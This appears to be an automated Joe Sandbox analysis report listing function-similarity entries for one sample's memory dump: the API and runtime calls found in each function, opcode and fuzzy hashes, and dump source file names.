                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Uninitialize$CreateInitializeInstance
                • String ID:
                • API String ID: 1968832861-0
                • Opcode ID: 655b834db8b22794c051ed908d8299002aeeaa5e9cd73c9b80e61bbc36e413fc
                • Instruction ID: 21f53bca3cb5573e579a6d3f64a90524944395fdd8b9147cceb24e7aa3bb8359
                • Opcode Fuzzy Hash: 655b834db8b22794c051ed908d8299002aeeaa5e9cd73c9b80e61bbc36e413fc
                • Instruction Fuzzy Hash: 25518E71A002089FDB04DFA8DC89BDEBBB9EF58714F108129F909E7390D774A945CBA1
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD4D96
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD4DB6
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4DD6
                • std::_Facet_Register.LIBCPMT ref: 00CD4E71
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4E89
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                • String ID:
                • API String ID: 459529453-0
                • Opcode ID: d795d66bfaa9dbce0c7b5768b2e4f3e6422da9f0b29917a0f11d17a3496e3be1
                • Instruction ID: 7fafcaf618f5280e2f28e045ab0e568bb185da09cc95b93301deed207418c481
                • Opcode Fuzzy Hash: d795d66bfaa9dbce0c7b5768b2e4f3e6422da9f0b29917a0f11d17a3496e3be1
                • Instruction Fuzzy Hash: 0A419271900254EFCB28DF54D841BAEB7B4FB54B10F14816FEA0AAB391DB30AD06CB90
                APIs
                • _free.LIBCMT ref: 00CF0D23
                  • Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
                  • Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E
                • _free.LIBCMT ref: 00CF0D35
                • _free.LIBCMT ref: 00CF0D47
                • _free.LIBCMT ref: 00CF0D59
                • _free.LIBCMT ref: 00CF0D6B
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 349cc54c63f323b0e62f9ca44422c0066dcb37988c6d424b870861ed58086861
                • Instruction ID: 6172e614d930bc7e3b9cdeeef9ff3aef918a242940b8fcf740030a84ebc36984
                • Opcode Fuzzy Hash: 349cc54c63f323b0e62f9ca44422c0066dcb37988c6d424b870861ed58086861
                • Instruction Fuzzy Hash: CAF09036500344BB8674EBA9E882C6A73EEEA00B107744C09F52CE7712CF34FC849A64
                APIs
                • Sleep.KERNEL32(00002710,79C85444,00000000,?), ref: 00CC9599
                  • Part of subcall function 00CBA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,79C85444,00000000,?), ref: 00CBA4BA
                • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00D17494,0000000E), ref: 00CC9615
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AttributesFileFolderPathSleep
                • String ID: 1F==$3Lrq
                • API String ID: 70540035-3568642885
                • Opcode ID: bc813d2dc8cc56818a7416425da409d62e48c8558eda376125a75060ac2bccc8
                • Instruction ID: 0ed5ad0fc19d9a919934ec067baecbe521a342d684085c0e67eacc320e873000
                • Opcode Fuzzy Hash: bc813d2dc8cc56818a7416425da409d62e48c8558eda376125a75060ac2bccc8
                • Instruction Fuzzy Hash: F5C1AE70D0428CEFEF14DBA8C948BDDBFB6EF05304F208199D4096B292D7B55A89DB61
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CloseHandleclosesocket
                • String ID: 246122658369$3Iy=
                • API String ID: 2025136489-1909603735
                • Opcode ID: 8285b1dd2b0e5bf62a8082148e6dfe2596f3cce1756c6d514eac134dfc4a74cb
                • Instruction ID: 8d55a56bde58156c6095ae87386729b6630025bfaaffb6700a45c2531d11efca
                • Opcode Fuzzy Hash: 8285b1dd2b0e5bf62a8082148e6dfe2596f3cce1756c6d514eac134dfc4a74cb
                • Instruction Fuzzy Hash: 9E710671610144ABEB0CEF38CD8AB9DBF62EB85354F50821DF815877C6DB39DA818792
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free
                • String ID: *?
                • API String ID: 269201875-2564092906
                • Opcode ID: d46e50ce1e427859c04948455d3f7a9b31efb8b2ea13eb9e83b8e7b3112f7b33
                • Instruction ID: fab32dc9815cf9556044e469a4d176cfdc9b1218ed472940cc5132306b08752f
                • Opcode Fuzzy Hash: d46e50ce1e427859c04948455d3f7a9b31efb8b2ea13eb9e83b8e7b3112f7b33
                • Instruction Fuzzy Hash: 9C614E76E002599FCB24CFA9C8819EDFBF5EF48350B25816AE815F7301D671AE418B90
                APIs
                • ___std_exception_copy.LIBVCRUNTIME ref: 00CB499F
                  • Part of subcall function 00CDAEA6: RaiseException.KERNEL32(E06D7363,00000001,00000003,00CB25DC,00CD0B87,8B18EC83,?,00CB25DC,?,00D1450C), ref: 00CDAF06
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ExceptionRaise___std_exception_copy
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 3109751735-1866435925
                • Opcode ID: 7d22bcd32029a7d564332532bd9edc4f3cdeda461ed5c57a74446d54e117644b
                • Instruction ID: f36b34566dad6482047d4c3b268dbc39b1157e5e793b9b8c6e7e77fcd729cee8
                • Opcode Fuzzy Hash: 7d22bcd32029a7d564332532bd9edc4f3cdeda461ed5c57a74446d54e117644b
                • Instruction Fuzzy Hash: 8F11E1B1904305ABC714DB58C802B97B7E9AF51310F14862AF96887682EB70E914CB62
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _strrchr
                • String ID:
                • API String ID: 3213747228-0
                • Opcode ID: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
                • Instruction ID: 2b0b3e9147d69aba9da663a3090c18bffcfe571c04f221843259eec7be6573dd
                • Opcode Fuzzy Hash: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
                • Instruction Fuzzy Hash: 08B134329002C6AFDF11CF6AC881BAEBBF5EF55300F24416AE955EB342D6349E41CB61
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: d31cd9f415c95f7dddbe9a152a25d0819b127e3d6c7b0267b8700e604375e236
                • Instruction ID: 869f259e1fc4b2354806007dd187a3208b0ad7de03b8855de8ad684a825c8c91
                • Opcode Fuzzy Hash: d31cd9f415c95f7dddbe9a152a25d0819b127e3d6c7b0267b8700e604375e236
                • Instruction Fuzzy Hash: 6851D4B2A0520BAFDB25DF14D8C1B6AB7A4EF40300F14451FEA1997791D731EE50EB90
                APIs
                • __Mtx_unlock.LIBCPMT ref: 00CD5D47
                • std::_Rethrow_future_exception.LIBCPMT ref: 00CD5D99
                • std::_Rethrow_future_exception.LIBCPMT ref: 00CD5DA9
                  • Part of subcall function 00CB3A60: __Mtx_unlock.LIBCPMT ref: 00CB3B54
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                • String ID:
                • API String ID: 3298230783-0
                • Opcode ID: 1a881f6881cada3371465db55fa132714ef03acef3f37f367a267aa143dc9f08
                • Instruction ID: 196bc3a402ebfbad12811b71112d728322e8f7dea125a3feb10df768ba52686b
                • Opcode Fuzzy Hash: 1a881f6881cada3371465db55fa132714ef03acef3f37f367a267aa143dc9f08
                • Instruction Fuzzy Hash: F0412971D007486FDB24EBA4D845BAEBBB89F05300F00452FE65253742EB30A648D7B2
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3b1ee0a27f4b2162a03b95ffb76b5322c5fada237a95bc7577a0c6ca35e57c6
                • Instruction ID: 343d646efd57b5308f9454c408d449b118a556d8f8f45f4a62e3488d1e1791cd
                • Opcode Fuzzy Hash: d3b1ee0a27f4b2162a03b95ffb76b5322c5fada237a95bc7577a0c6ca35e57c6
                • Instruction Fuzzy Hash: 6941F872A00754AFE725BF78CC55BAABBA9EB44710F10862FF615DF381D271EA409780
                APIs
                • _free.LIBCMT ref: 00CF70AE
                • _free.LIBCMT ref: 00CF70D7
                • SetEndOfFile.KERNEL32(00000000,00CF383D,00000000,00CE7241,?,?,?,?,?,?,?,00CF383D,00CE7241,00000000), ref: 00CF7109
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00CF383D,00CE7241,00000000,?,?,?,?,00000000), ref: 00CF7125
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFileLast
                • String ID:
                • API String ID: 1547350101-0
                • Opcode ID: dcd9e96780adda367509692b7d07cf2bfdff02e0f02a9ae852072eb4fd55c92f
                • Instruction ID: 29f41a11ac8af78e53963b77b1fb789caa4212d2eda02968460f9abe4a5b0986
                • Opcode Fuzzy Hash: dcd9e96780adda367509692b7d07cf2bfdff02e0f02a9ae852072eb4fd55c92f
                • Instruction Fuzzy Hash: C3412B725042899BDB61ABB9CC42BBD3776AF44360F240710FA24E7292DF34DE949763
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                • String ID:
                • API String ID: 3264154886-0
                • Opcode ID: fff9b369f32744df9207391bc20e8f26f044f5b860aa229c6aaaa2d0318d064a
                • Instruction ID: fce25ede9411418c3d50d0152a63fdab79feaf7f7362e4b2e1b9b3d5f25a268a
                • Opcode Fuzzy Hash: fff9b369f32744df9207391bc20e8f26f044f5b860aa229c6aaaa2d0318d064a
                • Instruction Fuzzy Hash: 04419C71A016159FCB11EB64D840BAAB7F8FF18314F04466AE92AC7781EB35EA04DBC1
                APIs
                  • Part of subcall function 00CDE7A8: _free.LIBCMT ref: 00CDE7B6
                  • Part of subcall function 00CEE2AF: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,00CE7F47,0000FDE9,8B18EC83,?,?,?,00CE7CC0,0000FDE9,00000000,?), ref: 00CEE35B
                • GetLastError.KERNEL32 ref: 00CEEE6B
                • __dosmaperr.LIBCMT ref: 00CEEE72
                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00CEEEB1
                • __dosmaperr.LIBCMT ref: 00CEEEB8
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                • String ID:
                • API String ID: 167067550-0
                • Opcode ID: a67446d926d19fcd4f282a5c74c9b5063d9b06a946dd90b0b79bee71d9a50e97
                • Instruction ID: 77e11e56bd45c8be02502da55a575f2ac485d74fd5caaeb8ae7222f2e73d3268
                • Opcode Fuzzy Hash: a67446d926d19fcd4f282a5c74c9b5063d9b06a946dd90b0b79bee71d9a50e97
                • Instruction Fuzzy Hash: 2D21D4716002D6AFEB20AF778C81D6BB7ADEF043A47104619F969D7260D731ED5097A0
                APIs
                • GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                • _free.LIBCMT ref: 00CE6C82
                • _free.LIBCMT ref: 00CE6CB8
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID:
                • API String ID: 2283115069-0
                • Opcode ID: 8b43f06faf0bb5ec2bfacb1832057250c1467392620a25a259dbf72d6852a3fa
                • Instruction ID: 86945844573dfaae0de7a418e8bc1952a379326976e9001d50f0245f678c248b
                • Opcode Fuzzy Hash: 8b43f06faf0bb5ec2bfacb1832057250c1467392620a25a259dbf72d6852a3fa
                • Instruction Fuzzy Hash: 4D11C6362543C13AD611667BAC8596B355ADBD03F57350334F2B8D22E2DD75CC4A6134
                APIs
                  • Part of subcall function 00CD7E19: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,00CD7E6B,00000014,?,00CD7EAC,00000014,?,00CB2D32,00000000,00000014,00000000,79C85444), ref: 00CD7E25
                • __Mtx_unlock.LIBCPMT ref: 00CD7EFE
                • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,79C85444,?,?,?,Function_000486E0,000000FF), ref: 00CD7F26
                • __Mtx_unlock.LIBCPMT ref: 00CD7F61
                • __Cnd_broadcast.LIBCPMT ref: 00CD7F72
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                • String ID:
                • API String ID: 420990631-0
                • Opcode ID: 6c31530297ed4bfd6756fbea4ccbfefea8da1385b3adae197537a9e061641095
                • Instruction ID: fcf6e1788ff097252e5eae7cfe825a2a82c058ab7b9b36f6cd9c4120a0a42b96
                • Opcode Fuzzy Hash: 6c31530297ed4bfd6756fbea4ccbfefea8da1385b3adae197537a9e061641095
                • Instruction Fuzzy Hash: B711E976908310ABCB217BA1EC02B6F7769EF04B20F00491BFA15D3791DF35D901D661
                APIs
                • GetLastError.KERNEL32(00CD0B87,00CD0B87,8B18EC83,00CE10B7,00CE8278,?,?,00CD9C1F,00CD0B87,?,00CD321E,8B18EC84,75920F00), ref: 00CE6D7C
                • _free.LIBCMT ref: 00CE6DD9
                • _free.LIBCMT ref: 00CE6E0F
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00CD9C1F,00CD0B87,?,00CD321E,8B18EC84,75920F00), ref: 00CE6E1A
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID:
                • API String ID: 2283115069-0
                • Opcode ID: 21711ad823e0ccecf7ddae04fc81ea8f1965d3e41e6e050793d66ae9d52d1621
                • Instruction ID: 2bc0d28f7ba1af7842d884c5310cf8dbb2df8ecfb34aade3c8ebf344676f2fdd
                • Opcode Fuzzy Hash: 21711ad823e0ccecf7ddae04fc81ea8f1965d3e41e6e050793d66ae9d52d1621
                • Instruction Fuzzy Hash: 4811E13A3143803ADA112277AC86EAB355A9BD07B4B250338F138D32E2DE71CD0A6234
                APIs
                • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00CF57E7,?,?,?,00000020,00000001), ref: 00CE9D05
                • GetLastError.KERNEL32(?,00CF57E7,?,?,?,00000020,00000001), ref: 00CE9D0F
                • __dosmaperr.LIBCMT ref: 00CE9D16
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorFullLastNamePath__dosmaperr
                • String ID:
                • API String ID: 2398240785-0
                • Opcode ID: 231553180b11be876cb75f56533994c1a52a34e24e3bc3643ed3722dc60e7e24
                • Instruction ID: 5f36bdb03e048dc522de11f266f639b011f7615122ad4d60782b05b353a1aada
                • Opcode Fuzzy Hash: 231553180b11be876cb75f56533994c1a52a34e24e3bc3643ed3722dc60e7e24
                • Instruction Fuzzy Hash: 02F01D366002A5BBCB206BA7DC08A5BBF69FF487A03148515F62DC7120D731EA61D7E0
                APIs
                • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00CF5772,?,?,?,?,00000020,00000001), ref: 00CE9D6E
                • GetLastError.KERNEL32(?,00CF5772,?,?,?,?,00000020,00000001), ref: 00CE9D78
                • __dosmaperr.LIBCMT ref: 00CE9D7F
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorFullLastNamePath__dosmaperr
                • String ID:
                • API String ID: 2398240785-0
                • Opcode ID: d18512388ffd342288df39428cbfcd5e8d75cc57469327d656fa976045054efc
